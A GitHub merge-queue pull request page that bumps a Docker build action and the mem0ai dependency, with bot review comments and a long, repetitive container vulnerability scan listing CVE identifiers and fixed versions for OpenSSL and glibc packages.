Skip to content

merge queue: checking main (f2f680c), #2396 and #2397 together#2399

Closed
mergify[bot] wants to merge 4 commits into
mainfrom
mergify/merge-queue/35440bf950
Closed

merge queue: checking main (f2f680c), #2396 and #2397 together#2399
mergify[bot] wants to merge 4 commits into
mainfrom
mergify/merge-queue/35440bf950

Conversation

@mergify

@mergify mergify Bot commented Jul 1, 2026

Copy link
Copy Markdown
Contributor

🎉 This pull request has been checked successfully and will be merged soon. 🎉

Branch main (f2f680c), #2396 and #2397 are queued together for merge.

This pull request has been created by Mergify to speculatively check the mergeability of #2397.
You don't need to do anything. Mergify will close this pull request automatically when it is complete.

Required conditions of queue rule Github Actions Updates for merge:

  • any of [🛡 GitHub repository ruleset rule main]:
    • check-neutral = @mergify/Mergify Merge Protections
    • check-skipped = @mergify/Mergify Merge Protections
    • check-success = @mergify/Mergify Merge Protections

Required conditions to stay in the queue:

---
checking_base_sha: 9433d0750738e1cee8e3f632b326a271a519c011
previous_check_retries: []
previous_failed_batches: []
pull_requests:
  - number: 2397
    scopes: []
scopes: []
...

@semanticdiff-com

semanticdiff-com Bot commented Jul 1, 2026

Copy link
Copy Markdown

Review changes with  SemanticDiff

Changed Files
File Status
  .github/workflows/.docker.yaml  13% smaller
  pyproject.toml Unsupported file format
  uv.lock Unsupported file format

@mergify mergify Bot temporarily deployed to code_quality July 1, 2026 21:04 Inactive
@sourcery-ai

sourcery-ai Bot commented Jul 1, 2026

Copy link
Copy Markdown
Contributor
Reviewer's guide (collapsed on small PRs)

Reviewer's Guide

Updates CI configuration and Python dependencies: bumps docker/build-push-action to v7.3.0 in the Docker GitHub Actions workflow and raises the mem0ai library minimum version to 2.0.11, with lockfile adjustments in uv.lock.

File-Level Changes

Change Details Files
Bump Docker GitHub Action used for linting and building images in CI to v7.3.0.
  • Update docker/build-push-action reference used for Dockerfile linting to the new SHA corresponding to v7.3.0.
  • Update docker/build-push-action reference used for building and pushing images to the new SHA corresponding to v7.3.0.
.github/workflows/.docker.yaml
Raise mem0ai Python dependency and sync lockfile.
  • Increase mem0ai minimum required version from 2.0.10 to 2.0.11 in the core dependency list.
  • Regenerate or update uv.lock to reflect the new mem0ai version and any transitive resolution changes.
pyproject.toml
uv.lock

Possibly linked issues

  • #: PR updates mem0ai and docker/build-push-action exactly as requested in the Renovate Dependency Dashboard issue.

Tips and commands

Interacting with Sourcery

  • Trigger a new review: Comment @sourcery-ai review on the pull request.
  • Continue discussions: Reply directly to Sourcery's review comments.
  • Generate a GitHub issue from a review comment: Ask Sourcery to create an
    issue from a review comment by replying to it. You can also reply to a
    review comment with @sourcery-ai issue to create an issue from it.
  • Generate a pull request title: Write @sourcery-ai anywhere in the pull
    request title to generate a title at any time. You can also comment
    @sourcery-ai title on the pull request to (re-)generate the title at any time.
  • Generate a pull request summary: Write @sourcery-ai summary anywhere in
    the pull request body to generate a PR summary at any time exactly where you
    want it. You can also comment @sourcery-ai summary on the pull request to
    (re-)generate the summary at any time.
  • Generate reviewer's guide: Comment @sourcery-ai guide on the pull
    request to (re-)generate the reviewer's guide at any time.
  • Resolve all Sourcery comments: Comment @sourcery-ai resolve on the
    pull request to resolve all Sourcery comments. Useful if you've already
    addressed all the comments and don't want to see them anymore.
  • Dismiss all Sourcery reviews: Comment @sourcery-ai dismiss on the pull
    request to dismiss all existing Sourcery reviews. Especially useful if you
    want to start fresh with a new review - don't forget to comment
    @sourcery-ai review to trigger a new review!

Customizing Your Experience

Access your dashboard to:

  • Enable or disable review features such as the Sourcery-generated pull request
    summary, the reviewer's guide, and others.
  • Change the review language.
  • Add, remove or edit custom review instructions.
  • Adjust other review settings.

Getting Help

@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:04 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:04 Failure
@mergify mergify Bot temporarily deployed to code_quality July 1, 2026 21:04 Inactive
@mergify mergify Bot temporarily deployed to code_quality July 1, 2026 21:04 Inactive
@mergify mergify Bot temporarily deployed to code_quality July 1, 2026 21:04 Inactive
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:04 Failure
@mergify mergify Bot temporarily deployed to code_quality July 1, 2026 21:04 Inactive
@mergify mergify Bot temporarily deployed to code_quality July 1, 2026 21:04 Inactive
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:04 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:04 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:04 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:04 Failure
@mergify mergify Bot temporarily deployed to code_quality July 1, 2026 21:04 Inactive
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:04 Failure
@mergify mergify Bot temporarily deployed to code_quality July 1, 2026 21:04 Inactive
@mergify mergify Bot temporarily deployed to code_quality July 1, 2026 21:04 Inactive
@mergify mergify Bot temporarily deployed to code_quality July 1, 2026 21:04 Inactive
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:04 Failure
@mergify mergify Bot temporarily deployed to code_quality July 1, 2026 21:04 Inactive
@mergify mergify Bot temporarily deployed to code_quality July 1, 2026 21:04 Inactive
@mergify mergify Bot temporarily deployed to code_quality July 1, 2026 21:04 Inactive
@socket-security

Copy link
Copy Markdown

Review the following changes in direct dependencies. Learn more about Socket for GitHub.

Diff Package Supply Chain
Security
Vulnerability Quality Maintenance License
Updatedmem0ai@​2.0.10 ⏵ 2.0.1199 +1100100100100

View full report

@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:06 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:06 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:06 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:06 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:06 Failure
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:06 Failure
@mergify mergify Bot temporarily deployed to docker_image July 1, 2026 21:06 Inactive
@mergify mergify Bot closed this Jul 1, 2026
@mergify mergify Bot deleted the mergify/merge-queue/35440bf950 branch July 1, 2026 21:07
@mergify mergify Bot temporarily deployed to container_health July 1, 2026 21:09 Inactive
@mergify mergify Bot temporarily deployed to container_health July 1, 2026 21:09 Inactive
@mergify mergify Bot temporarily deployed to container_health July 1, 2026 21:09 Inactive
@mergify mergify Bot temporarily deployed to container_health July 1, 2026 21:09 Inactive
@mergify mergify Bot had a problem deploying to container_health July 1, 2026 21:09 Failure
@mergify mergify Bot temporarily deployed to container_health July 1, 2026 21:09 Inactive
@mergify mergify Bot had a problem deploying to container_health July 1, 2026 21:09 Failure
@MH0386

MH0386 commented Jul 1, 2026

Copy link
Copy Markdown
Contributor

🔍 Vulnerabilities of ghcr.io/alphaspheredotai/chattr:0878199-pr-2399

📦 Image Reference ghcr.io/alphaspheredotai/chattr:0878199-pr-2399
digestsha256:862fdfe6dc504d355cd82eef332c7149692ae38568b41100845f861a8c023213
vulnerabilitiescritical: 15 high: 58 medium: 25 low: 10 unspecified: 11
platformlinux/amd64
size282 MB
packages430
critical: 1 high: 9 medium: 5 low: 2 libcrypto3 3.6.2-r2 (apk)

pkg:apk/wolfi/libcrypto3@3.6.2-r2?arch=x86_64&distro=wolfi

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--34182

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.237%
EPSS Percentile15th percentile
Description

high : CVE--2026--45447

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score2.719%
EPSS Percentile84th percentile
Description

high : CVE--2026--7383

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.358%
EPSS Percentile28th percentile
Description

high : CVE--2026--9076

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.297%
EPSS Percentile21st percentile
Description

high : CVE--2026--45445

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.320%
EPSS Percentile24th percentile
Description

high : CVE--2026--42765

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.419%
EPSS Percentile34th percentile
Description

high : CVE--2026--42764

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.684%
EPSS Percentile48th percentile
Description

high : CVE--2026--34183

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.511%
EPSS Percentile40th percentile
Description

high : CVE--2026--34180

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.513%
EPSS Percentile40th percentile
Description

high : CVE--2026--34181

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.196%
EPSS Percentile9th percentile
Description

medium : CVE--2026--42767

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.349%
EPSS Percentile27th percentile
Description

medium : CVE--2026--42766

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.595%
EPSS Percentile44th percentile
Description

medium : CVE--2026--42769

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.262%
EPSS Percentile17th percentile
Description

medium : CVE--2026--35188

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.245%
EPSS Percentile16th percentile
Description

medium : CVE--2026--45446

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.210%
EPSS Percentile11th percentile
Description

low : CVE--2026--42770

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.259%
EPSS Percentile17th percentile
Description

low : CVE--2026--42768

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.350%
EPSS Percentile27th percentile
Description
critical: 1 high: 9 medium: 5 low: 2 libcrypto3 3.6.2-r2 (apk)

pkg:apk/wolfi/libcrypto3@3.6.2-r2?arch=x86_64&origin=openssl

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--34182

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.237%
EPSS Percentile15th percentile
Description

high : CVE--2026--45447

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score2.719%
EPSS Percentile84th percentile
Description

high : CVE--2026--7383

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.358%
EPSS Percentile28th percentile
Description

high : CVE--2026--9076

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.297%
EPSS Percentile21st percentile
Description

high : CVE--2026--45445

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.320%
EPSS Percentile24th percentile
Description

high : CVE--2026--42765

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.419%
EPSS Percentile34th percentile
Description

high : CVE--2026--42764

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.684%
EPSS Percentile48th percentile
Description

high : CVE--2026--34183

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.511%
EPSS Percentile40th percentile
Description

high : CVE--2026--34180

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.513%
EPSS Percentile40th percentile
Description

high : CVE--2026--34181

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.196%
EPSS Percentile9th percentile
Description

medium : CVE--2026--42767

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.349%
EPSS Percentile27th percentile
Description

medium : CVE--2026--42766

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.595%
EPSS Percentile44th percentile
Description

medium : CVE--2026--42769

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.262%
EPSS Percentile17th percentile
Description

medium : CVE--2026--35188

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.245%
EPSS Percentile16th percentile
Description

medium : CVE--2026--45446

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.210%
EPSS Percentile11th percentile
Description

low : CVE--2026--42770

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.259%
EPSS Percentile17th percentile
Description

low : CVE--2026--42768

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.350%
EPSS Percentile27th percentile
Description
critical: 1 high: 9 medium: 5 low: 2 libcrypto3 3.6.2-r2 (apk)

pkg:apk/wolfi/libcrypto3@3.6.2-r2?arch=x86_64&distro=wolfi-20230201&upstream=openssl

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--34182

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.237%
EPSS Percentile15th percentile
Description

high : CVE--2026--45447

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score2.719%
EPSS Percentile84th percentile
Description

high : CVE--2026--7383

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.358%
EPSS Percentile28th percentile
Description

high : CVE--2026--9076

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.297%
EPSS Percentile21st percentile
Description

high : CVE--2026--45445

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.320%
EPSS Percentile24th percentile
Description

high : CVE--2026--42765

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.419%
EPSS Percentile34th percentile
Description

high : CVE--2026--42764

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.684%
EPSS Percentile48th percentile
Description

high : CVE--2026--34183

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.511%
EPSS Percentile40th percentile
Description

high : CVE--2026--34180

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.513%
EPSS Percentile40th percentile
Description

high : CVE--2026--34181

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.196%
EPSS Percentile9th percentile
Description

medium : CVE--2026--42767

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.349%
EPSS Percentile27th percentile
Description

medium : CVE--2026--42766

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.595%
EPSS Percentile44th percentile
Description

medium : CVE--2026--42769

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.262%
EPSS Percentile17th percentile
Description

medium : CVE--2026--35188

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.245%
EPSS Percentile16th percentile
Description

medium : CVE--2026--45446

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.210%
EPSS Percentile11th percentile
Description

low : CVE--2026--42770

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.259%
EPSS Percentile17th percentile
Description

low : CVE--2026--42768

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.350%
EPSS Percentile27th percentile
Description
critical: 1 high: 9 medium: 5 low: 2 libssl3 3.6.2-r2 (apk)

pkg:apk/wolfi/libssl3@3.6.2-r2?arch=x86_64&distro=wolfi-20230201&upstream=openssl

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--34182

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.237%
EPSS Percentile15th percentile
Description

high : CVE--2026--45447

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score2.719%
EPSS Percentile84th percentile
Description

high : CVE--2026--7383

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.358%
EPSS Percentile28th percentile
Description

high : CVE--2026--9076

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.297%
EPSS Percentile21st percentile
Description

high : CVE--2026--45445

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.320%
EPSS Percentile24th percentile
Description

high : CVE--2026--42765

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.419%
EPSS Percentile34th percentile
Description

high : CVE--2026--42764

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.684%
EPSS Percentile48th percentile
Description

high : CVE--2026--34183

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.511%
EPSS Percentile40th percentile
Description

high : CVE--2026--34180

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.513%
EPSS Percentile40th percentile
Description

high : CVE--2026--34181

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.196%
EPSS Percentile9th percentile
Description

medium : CVE--2026--42767

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.349%
EPSS Percentile27th percentile
Description

medium : CVE--2026--42766

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.595%
EPSS Percentile44th percentile
Description

medium : CVE--2026--42769

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.262%
EPSS Percentile17th percentile
Description

medium : CVE--2026--35188

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.245%
EPSS Percentile16th percentile
Description

medium : CVE--2026--45446

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.210%
EPSS Percentile11th percentile
Description

low : CVE--2026--42770

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.259%
EPSS Percentile17th percentile
Description

low : CVE--2026--42768

Affected range<3.6.3-r0
Fixed version3.6.3-r0
EPSS Score0.350%
EPSS Percentile27th percentile
Description
critical: 1 high: 1 medium: 0 low: 0 glibc-locale-posix 2.43-r6 (apk)

pkg:apk/wolfi/glibc-locale-posix@2.43-r6?arch=x86_64&origin=glibc

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--5450

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.451%
EPSS Percentile36th percentile
Description

high : CVE--2026--5928

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.345%
EPSS Percentile26th percentile
Description
critical: 1 high: 1 medium: 0 low: 0 ld-linux 2.43-r6 (apk)

pkg:apk/wolfi/ld-linux@2.43-r6?arch=x86_64&origin=glibc

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--5450

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.451%
EPSS Percentile36th percentile
Description

high : CVE--2026--5928

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.345%
EPSS Percentile26th percentile
Description
critical: 1 high: 1 medium: 0 low: 0 ld-linux 2.43-r6 (apk)

pkg:apk/wolfi/ld-linux@2.43-r6?arch=x86_64&distro=wolfi-20230201&upstream=glibc

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--5450

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.451%
EPSS Percentile36th percentile
Description

high : CVE--2026--5928

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.345%
EPSS Percentile26th percentile
Description
critical: 1 high: 1 medium: 0 low: 0 ld-linux 2.43-r6 (apk)

pkg:apk/wolfi/ld-linux@2.43-r6?arch=x86_64&distro=wolfi

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--5450

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.451%
EPSS Percentile36th percentile
Description

high : CVE--2026--5928

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.345%
EPSS Percentile26th percentile
Description
critical: 1 high: 1 medium: 0 low: 0 glibc-locale-posix 2.43-r6 (apk)

pkg:apk/wolfi/glibc-locale-posix@2.43-r6?arch=x86_64&distro=wolfi-20230201&upstream=glibc

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--5450

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.451%
EPSS Percentile36th percentile
Description

high : CVE--2026--5928

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.345%
EPSS Percentile26th percentile
Description
critical: 1 high: 1 medium: 0 low: 0 libcrypt1 2.43-r6 (apk)

pkg:apk/wolfi/libcrypt1@2.43-r6?arch=x86_64&distro=wolfi-20230201&upstream=glibc

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--5450

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.451%
EPSS Percentile36th percentile
Description

high : CVE--2026--5928

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.345%
EPSS Percentile26th percentile
Description
critical: 1 high: 1 medium: 0 low: 0 libcrypt1 2.43-r6 (apk)

pkg:apk/wolfi/libcrypt1@2.43-r6?arch=x86_64&distro=wolfi

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--5450

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.451%
EPSS Percentile36th percentile
Description

high : CVE--2026--5928

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.345%
EPSS Percentile26th percentile
Description
critical: 1 high: 1 medium: 0 low: 0 glibc-locale-posix 2.43-r6 (apk)

pkg:apk/wolfi/glibc-locale-posix@2.43-r6?arch=x86_64&distro=wolfi

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--5450

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.451%
EPSS Percentile36th percentile
Description

high : CVE--2026--5928

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.345%
EPSS Percentile26th percentile
Description
critical: 1 high: 1 medium: 0 low: 0 libcrypt1 2.43-r6 (apk)

pkg:apk/wolfi/libcrypt1@2.43-r6?arch=x86_64&origin=glibc

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--5450

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.451%
EPSS Percentile36th percentile
Description

high : CVE--2026--5928

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.345%
EPSS Percentile26th percentile
Description
critical: 1 high: 1 medium: 0 low: 0 glibc 2.43-r6 (apk)

pkg:apk/wolfi/glibc@2.43-r6?arch=x86_64&distro=wolfi

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS production

critical : CVE--2026--5450

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.451%
EPSS Percentile36th percentile
Description

high : CVE--2026--5928

Affected range<2.43-r7
Fixed version2.43-r7
EPSS Score0.345%
EPSS Percentile26th percentile
Description
critical: 1 high: 1 medium: 0 low: 0 glibc 2.43-r6 (apk)

pkg:apk/wolfi/glibc@2.43-r6?arch=x86_64&origin=glibc

# Dockerfile (1:14)
FROM cgr.dev/chainguard/wolfi-base:latest@sha256:1af610c4a70668dad46159ee178b20378c79a49b554f76405670fc442d30183a AS builder

ARG INSTALL_SOURCE
ARG PYTHON_VERSION

# skipcq: DOK-DL3018
RUN apk add --no-cache build-base git uv

USER nonroot

RUN --mount=type=cache,target=/root/.cache/uv \
    uv tool install ${INSTALL_SOURCE} --python ${PYTHON_VERSION}

